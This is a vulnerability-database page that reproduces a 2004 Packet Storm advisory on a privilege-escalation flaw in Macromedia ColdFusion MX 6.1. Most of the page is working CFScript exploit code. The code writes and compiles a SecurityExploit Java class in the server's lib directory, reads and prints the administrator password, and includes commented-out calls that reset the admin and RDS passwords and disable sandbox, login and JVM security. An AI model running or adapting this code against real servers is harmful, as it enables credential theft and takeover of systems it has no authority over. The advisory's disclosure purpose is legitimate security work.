Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormEric LackeyPACKETSTORM:34552
HistoryOct 07, 2004 - 12:00 a.m.

coldfusionmx61.txt

2004-10-0700:00:00
Eric Lackey
packetstormsecurity.com
24
JSON
`Software: Macromedia ColdFusion MX 6.1  
  
Description:  
There is a vulnerability in the ColdFusion MX 6.1 product. To exploit  
this, a user needs access to create a cold fusion template on a  
ColdFusion server with CreateObject or cfobject tags enabled. The  
code given below writes a java class to the ColdFusion lib directory  
which allows writing by default. This code compiles the java file,  
but there are other ways to write the class file if the compiler class  
is not available. Once the class is written, it can be accessed by CF  
and all methods exposed. A user can do a variety of things like  
getting the administrator password. Code and examples are given  
below.  
  
Platform Tested: Windows/Linux  
  
Version Tested: ColdFusion MX 6.1  
  
<cfscript>  
  
objFileWriter = CreateObject("java","java.io.FileWriter");  
  
objByteArray = CreateObject("java","java.io.ByteArrayOutputStream");  
  
objJavaC = CreateObject("java","sun.tools.javac.Main");  
  
objString = CreateObject("java","java.lang.String");  
  
objFile = CreateObject("java","java.io.File");  
  
if (Server.Os.Name IS "Windows") { s = "\"; } else { s = "/"; }  
  
strJavaSource = "#Server.ColdFusion.Rootdir##s#lib#s#SecurityExploit.java";   
  
strCfusionJar = "#Server.ColdFusion.Rootdir##s#lib#s#cfusion.jar";  
  
strNeoSecFile = "#Server.ColdFusion.Rootdir##s#lib#s#neo-security.xml";  
  
strPasswdFile = "#Server.ColdFusion.Rootdir##s#lib#s#password.properties";  
  
fileWriter = objFileWriter.init("#strJavaSource#",false);  
  
fileWriter.write("import coldfusion.security.SecurityManager;");  
  
fileWriter.write("import java.io.File;");  
  
fileWriter.write("public class SecurityExploit extends SecurityManager {");  
  
fileWriter.write("public SecurityExploit(File arg0, File arg1) {");  
  
fileWriter.write("super(arg0, arg1); }");  
  
fileWriter.write("public boolean isAdminSecurityEnabled(){");  
  
fileWriter.write("return false;}}");  
  
fileWriter.flush();  
  
fileWriter.close();  
  
str = objString.init("-classpath,#strCfusionJar#,#strJavaSource#");  
  
strArr = str.split(",");  
  
byteArray = objByteArray.init();  
  
compileObj =objJavaC.init(byteArray,str);  
  
compileObj.compile(strArr);  
  
obj = CreateObject("java","SecurityExploit");  
  
file1 = objFile.init("#strNeoSecFile#");  
  
file2 = objFile.init("#strPasswdFile#");  
  
obj.init(file1,file2);  
  
obj.load();  
  
</cfscript>  
  
<cfscript>  
  
// Get Administrator Password   
  
strAdminPw = obj.getAdminPassword();  
  
// Set Administrator Password  
  
//obj.setAdminPassword("test123");  
  
  
// Turn off Sandbox Security  
  
//obj.setSandboxSecurityEnabled(false);  
  
  
// Turn off Administrator Login  
  
//obj.setAdminSecurityEnabled(false);  
  
  
// Turn off RDS Login  
  
//obj.setRdsSecurityEnabled(false);  
  
  
// Set RDS Password  
  
//obj.setRdsPassword("test123");  
  
  
// Turn off JVM Security  
  
//obj.setJvmSecurityEnabled(false);  
  
</cfscript>  
  
<cfoutput>Adminstrator Password: #strAdminPw#</cfoutput>  
`
JSON